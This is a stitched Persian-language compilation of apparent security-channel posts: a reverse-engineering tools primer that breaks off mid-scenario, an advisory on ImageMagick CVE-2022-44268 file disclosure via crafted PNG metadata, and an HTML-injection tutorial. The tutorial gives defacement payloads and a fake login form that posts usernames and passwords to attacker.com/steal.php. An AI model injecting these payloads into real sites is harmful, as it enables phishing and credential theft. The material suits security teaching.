تحلیل بدافزار از طریق مهندسی معکوس به ما اجازه می‌دهد تا به این سوالات پاسخ دهیم. با (Decompilation) و (Disassembly) کد، می‌توانیم به منطق برنامه پی ببریم، الگوریتم‌های آن را درک کنیم و به اهداف نهایی نویسنده آن پی ببریم.

ابزارهای ضروری برای تحلیلگر بدافزار

شما به یک جعبه ابزار مناسب نیاز دارید. این ابزارها به دو دسته اصلی تقسیم می‌شوند: (Static Analysis) و (Dynamic Analysis)

۱. ابزارهای تحلیل استاتیک

در این نوع تحلیل، ما برنامه را بدون اجرا کردن آن بررسی می‌کنیم. هدف، بررسی ساختار فایل، رشته‌های متنی (Strings)، کتابخانه‌های استفاده شده (Libraries) و خودِ کدهای اسمبلی است.

۔ Disassemblers :

* ۔IDA Pro/IDA Free: استاندارد طلایی در دنیای مهندسی معکوس. این ابزار قدرتمند قابلیت‌های بی‌نظیری برای تحلیل برنامه‌ها ارائه می‌دهد.

* ۔Ghidra: یک ابزار رایگان و متن‌باز که توسط NSA (آژانس امنیت ملی آمریکا) توسعه داده شده است. Ghidra یک رقیب جدی برای IDA Pro محسوب می‌شود و قابلیت Decompilation به زبان شبه C را نیز دارد.

* ۔Radare2/Cutter: یک فریمورک قدرتمند و خط-فرمانی (Command-line) برای مهندسی معکوس است که Cutter واسط گرافیکی آن محسوب می‌شود.

۔ File Format Analyzers :

* ۔PE-bear/PEStudio: برای تحلیل فایل‌های اجرایی ویندوز (Portable Executable) فوق‌العاده هستند. با این ابزارها می‌توانید هدرها (Headers)، بخش‌ها (Sections)، و توابع Import/Export شده را بررسی کنید.

۲. ابزارهای تحلیل داینامیک

در این روش، بدافزار را در یک محیط کنترل‌شده و ایزوله (Sandbox) اجرا می‌کنیم تا رفتار آن را مشاهده و تحلیل کنیم.

* ۔Debuggers: این ابزارها به شما اجازه می‌دهند تا برنامه را خط به خط اجرا کرده، وضعیت رجیسترها (Registers) و حافظه (Memory) را مشاهده و در نقاط مشخصی از اجرا، آن را متوقف کنید (Breakpoints).

* ۔x64dbg/x32dbg: دیباگرهای مدرن و قدرتمند برای ویندوز که به صورت گسترده توسط تحلیلگران استفاده می‌شوند.

* ۔WinDbg: دیباگر رسمی مایکروسافت که برای تحلیل‌های سطح پایین (Low-level) و کرنل (Kernel) بسیار کارآمد است.

* ۔GDB (GNU Debugger): دیباگر استاندارد در سیستم‌عامل‌های مبتنی بر لینوکس.

۔Monitoring Tools :

* ۔Procmon (Process Monitor): ابزاری از مجموعه Sysinternals که فعالیت‌های فایل سیستم، رجیستری و فرآیندهای سیستم را در لحظه نمایش می‌دهد.

* ۔Wireshark: برای شنود و تحلیل ترافیک شبکه استفاده می‌شود. با این ابزار می‌توانید بفهمید بدافزار با چه سرورهای فرماندهی و کنترلی (C2) ارتباط برقرار می‌کند.


آشنایی با زبان اسمبلی (Assembly) - زبان ماشین

برای درک عمیق مهندسی معکوس، آشنایی با زبان اسمبلی ضروری است. اسمبلی یک زبان برنامه‌نویسی سطح پایین است که ارتباط مستقیمی با معماری پردازنده (CPU) دارد. هر دستور در اسمبلی معادل یک دستورالعمل پایه‌ای برای پردازنده است.

برخی از دستورات پایه‌ای که باید بشناسید:

۔* MOV : داده‌ها را بین رجیسترها و حافظه جابجا می‌کند.
۔* ADD / SUB : عملیات جمع و تفریق را انجام می‌دهند.
۔* JMP (Jump) : پرش به بخش دیگری از کد.
۔* CMP (Compare) : دو مقدار را مقایسه می‌کند و فلگ‌های پردازنده را بر اساس نتیجه تنظیم می‌کند.
۔* JE / JNE (Jump if Equal/Jump if Not Equal) : پرش‌های شرطی که بر اساس نتیجه CMP عمل می‌کنند.
۔* CALL : یک تابع را فراخوانی می‌کند.
۔* RET (Return) : از یک تابع بازمی‌گردد.

رجیسترهای اصلی در معماری x86 که باید با آن‌ها آشنا باشید:

۔* General Purpose Registers :

۔* EAX : معمولاً برای نگهداری مقدار بازگشتی از توابع استفاده می‌شود.
۔* EBX , ECX , EDX : برای مقاصد عمومی.
۔* ESP : اشاره‌گر پشته (Stack Pointer).
۔* EBP : اشاره‌گر پایه پشته (Base Pointer).
۔* ESI , EDI : برای عملیات روی رشته‌ها و داده‌ها.

۔* Instruction Pointer:
۔* EIP : به آدرس دستور بعدی که باید اجرا شود، اشاره می‌کند.

یک سناریوی عملی: تحلیل یک بدافزار ساده

فرض کنید یک فایل crackme.exe داریم که می‌خواهیم آن را تحلیل کنیم. هدف ما پیدا کردن "رمز عبور" صحیح برای اجرای موفقیت‌آمیز آن است.👇

#✅ImageMagick

به‌روزرسانی فوری در ابزار چند پلتفرمی ImageMagick

یک آسیب‌پذیری بسیار خطرناک از نوع (RCE) با شناسه CVE-2022-44268 در ImageMagick کشف شده.


آسیب‌پذیری به مهاجم اجازه می‌دهد که با استفاده از یک فایل تصویری PNG دستکاری‌شده، محتوای فایل‌های دلخواه روی سرور را بخواند و آن را به بیرون نشت دهد.

سناریوی حمله به این صورت عمل می‌کند:

مهاجم یک فایل PNG مخرب ایجاد می‌کند.

در داخل متادیتای این فایل، مسیری به یک فایل حساس روی سرور (مثلاً /etc/passwd) جاسازی می‌شود.

قربانی (مثلاً یک وب‌سایت که از ImageMagick برای آپلود و پردازش تصویر پروفایل کاربران استفاده می‌کند) این فایل را بارگذاری و پردازش می‌کند.

کتابخانه ImageMagick هنگام پردازش، فایل مشخص‌شده در متادیتا را می‌خواند و محتوای آن را به عنوان بخشی از خروجی تصویر فشرده‌شده جدید قرار می‌دهد.

مهاجم با تحلیل تصویر خروجی، می‌تواند به محتوای فایل حساس دسترسی پیدا کند.

این آسیب‌پذیری به خودی خود یک RCE مستقیم نیست، اما می‌تواند با ضعف‌های امنیتی دیگر ترکیب شده و منجر به اجرای کد از راه دور و کنترل کامل سیستم شود.

@NullError_ir

✅#HTML_Injection

چگونه وب‌سایت‌ها را فقط با HTML Injection هک کنیم

در این تحلیل، به بررسی مفاهیم، ارائه‌ی Payload های متنوع‌تر و تشریح سناریوهای حمله و روش‌های مقابله می‌پردازیم تا مطلبی جامع و تخصصی برای شما فراهم شود.

مقدمه: HTML Injection چیست و چرا اهمیت دارد؟

آسیب‌پذیری HTML Injection زمانی رخ می‌دهد که یک اپلیکیشن وب، ورودی کاربر را بدون اعتبارسنجی (Validation) یا پاک‌سازی (Sanitization) مناسب، مستقیماً در پاسخ HTML خود درج می‌کند. این ضعف به مهاجم اجازه می‌دهد تا کدهای HTML (و در موارد پیشرفته‌تر JavaScript) دلخواه خود را به صفحه وب تزریق کرده و محتوای نمایش داده شده به کاربران دیگر را دستکاری کند.

برخلاف تصور اولیه، این آسیب‌پذیری صرفاً یک "مشکل ظاهری" نیست و می‌تواند به حملات جدی‌تری مانند Phishing ، Defacement ، Session Hijacking (در صورت ترکیب با XSS) و سرقت اطلاعات حساس منجر شود. در واقع، HTML Injection اغلب به عنوان پله اول برای اجرای حملات پیچیده‌تر Cross-Site Scripting (XSS) در نظر گرفته می‌شود.

شناسایی آسیب‌پذیری HTML Injection

فرآیند کشف این آسیب‌پذیری معمولاً شامل شناسایی نقاط ورود داده (Input Vectors) در یک وب‌سایت است. این نقاط می‌توانند هر جایی باشند که کاربر قادر به ارسال داده است، از جمله:

فیلدهای جستجو
فرم‌های تماس و ارسال نظر
پارامترهای URL
فیلدهای پروفایل کاربری

تست اولیه:

ساده‌ترین راه برای تست، تزریق یک تگ HTML ساده و بررسی رندر شدن آن در خروجی صفحه است. Payload های ابتدایی می‌توانند شامل موارد زیر باشند:

<h1>TEST</h1> :
برای بررسی اینکه آیا تگ هدر با موفقیت رندر می‌شود.

<b>TEST</b> یا <i>TEST</i> :
برای تست تگ‌های قالب‌بندی متن.

<p style="color:red;">TEST</p> :
برای بررسی تزریق استایل‌های CSS.

اگر پس از ارسال این ورودی‌ها، متن "TEST" به صورت بزرگ، برجسته، کج یا با رنگ قرمز در صفحه ظاهر شود، به این معنی است که اپلیکیشن در برابر HTML Injection آسیب‌پذیر است.

مثال عملی:

فرض کنید یک وب‌سایت دارای پارامتر q در URL برای جستجو است:

https://example.com/search?q=my-query

مهاجم می‌تواند URL را به شکل زیر دستکاری کند:

https://example.com/search?q=<h1>Vulnerability-Found</h1>

اگر در صفحه‌ی نتایج، عبارت "Vulnerability-Found" به عنوان یک تیتر <h1> نمایش داده شود، آسیب‌پذیری تایید شده است.


سناریوهای حمله: از Defacement تا Phishing

پس از تایید آسیب‌پذیری، مهاجم می‌تواند حملات مختلفی را طراحی و اجرا کند. در اینجا به بررسی چند سناریوی رایج با جزئیات بیشتر می‌پردازیم.

1۔ Defacement (تغییر چهره وب‌سایت)

ساده‌ترین نوع حمله، تغییر موقت ظاهر وب‌سایت برای سایر بازدیدکنندگان است. این کار با تزریق تگ‌های HTML و استایل‌های CSS انجام می‌شود.

* پیلودی برای نمایش یک پیام بزرگ:

<h1 style="font-size:100px; color:red; text-align:center;">Hacked by Attacker</h1>
    

* پیلودی برای نمایش یک تصویر:

<img src="https://attacker.com/hacked.jpg" alt="Hacked">
    

این Payload یک تصویر از منبعی خارجی را در صفحه آسیب‌پذیر بارگذاری می‌کند.

2۔ Phishing (سرقت اطلاعات کاربری)

این سناریو یکی از خطرناک‌ترین کاربردهای HTML Injection است. مهاجم می‌تواند یک فرم لاگین جعلی ایجاد کرده و آن را در صفحه آسیب‌پذیر تزریق کند. کاربران بدون اینکه متوجه شوند، اطلاعات کاربری خود را در فرم مهاجم وارد می‌کنند.

پیلود فرم لاگین جعلی:

<h2>Please Login to Continue</h2>
    <form action="http://attacker.com/steal.php" method="post">
      Username: <input type="text" name="username"><br>
      Password: <input type="password" name="password"><br>
      <input type="submit" value="Login">
</form>
    

در این Payload، یک فرم لاگین ساده ایجاد شده است. مهم‌ترین بخش، action="http://attacker.com/steal.php" است. این ویژگی مشخص می‌کند که اطلاعات وارد شده در فرم (نام کاربری و رمز عبور) پس از کلیک روی دکمه "Login"، به سرور مهاجم ارسال خواهد شد. فایل steal.php در سرور مهاجم، اسکریپتی است که اطلاعات دریافتی را ذخیره می‌کند.

3. تزریق لینک‌ها و دکمه‌های مخرب

مهاجم می‌تواند کاربران را به سمت وب‌سایت‌های مخرب، دانلود بدافزار یا صفحات Phishing دیگر هدایت کند.